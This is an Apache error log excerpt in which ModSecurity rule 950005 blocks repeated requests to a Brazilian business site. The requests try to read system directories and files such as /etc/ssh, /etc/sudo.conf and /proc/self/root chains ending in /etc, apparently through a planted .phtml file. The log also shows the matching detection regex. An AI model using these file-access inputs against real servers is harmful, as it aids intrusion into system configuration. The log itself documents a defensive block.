[Fri Mar 20 08:59:13.972172 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.17:34852] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02kda6ubjKNq_cu4bhqQAAA1M"]
[Fri Mar 20 08:59:14.167091 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.17:34864] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02kta6ubjKNq_cu4bhqgAAA0w"]
[Fri Mar 20 08:59:14.671710 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.84:34880] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02kuoXxyEfFpUF8f-L5QAAAUc"]
[Fri Mar 20 08:59:14.824711 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:60592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02kjJ3M9BSuKP7CAYqdgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:14.838475 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.6:34888] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02krninkcc-iUj5AppdQAAA40"]
[Fri Mar 20 08:59:15.211725 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.108:34900] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02k9a6ubjKNq_cu4bhrgAAA0A"]
[Fri Mar 20 08:59:15.544493 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.98:34912] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02k9a6ubjKNq_cu4bhsQAAA0g"]
[Fri Mar 20 08:59:16.282155 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.44:34926] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lOoXxyEfFpUF8f-L5wAAAUU"]
[Fri Mar 20 08:59:16.343698 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.3:34930] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lF1pVZ5mVmJwsFM9EQAAAFc"]
[Fri Mar 20 08:59:16.603112 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.61:34940] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lBCii7xarUs8iHZy4AAAAgg"]
[Fri Mar 20 08:59:17.047473 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.31:34920] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lRCii7xarUs8iHZy4QAAAgM"]
[Fri Mar 20 08:59:17.484900 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.20:34964] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lbninkcc-iUj5AppeAAAA4s"]
[Fri Mar 20 08:59:17.824077 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.78:34972] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lV1pVZ5mVmJwsFM9EwAAAFA"]
[Fri Mar 20 08:59:17.852421 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.63:34916] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02leoXxyEfFpUF8f-L6wAAAUM"]
[Fri Mar 20 08:59:18.413069 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:33788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02ll1pVZ5mVmJwsFM9FQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:18.607472 2026] [:error] [pid 31215:tid 140411599251200] [client 57.141.18.27:34998] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lgF0L0L-SsrnPo50QgAAAtE"]
[Fri Mar 20 08:59:18.903063 2026] [:error] [pid 11642:tid 140411691570944] [client 57.141.18.93:35002] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lrninkcc-iUj5AppegAAA4Y"]
[Fri Mar 20 08:59:19.143587 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.9:35006] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02l_qxLDW4GITHUkT05QAAAQc"]
[Fri Mar 20 08:59:19.405102 2026] [:error] [pid 7893:tid 140411683178240] [client 57.141.18.124:35016] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02lxCii7xarUs8iHZy4gAAAgc"]
[Fri Mar 20 08:59:19.798875 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:35962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02l9a6ubjKNq_cu4bhuwAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:19.868780 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.21:34980] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02l11pVZ5mVmJwsFM9FgAAAFU"]
[Fri Mar 20 08:59:20.366700 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.88:35052] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02mPqxLDW4GITHUkT05gAAAQo"]
[Fri Mar 20 08:59:20.852523 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.85:35066] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02mPXLqtnMIWvjpaKmDwAAApA"]
[Fri Mar 20 08:59:21.047447 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.31:35072] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02mfqxLDW4GITHUkT05wAAARI"]
[Fri Mar 20 08:59:21.079107 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:35974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02mRCii7xarUs8iHZy4wAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:22.297572 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.6:35078] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02muoXxyEfFpUF8f-L8AAAAVA"]
[Fri Mar 20 08:59:22.370268 2026] [:error] [pid 31215:tid 140411616036608] [client 57.141.18.37:35034] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02mgF0L0L-SsrnPo50RQAAAs8"]
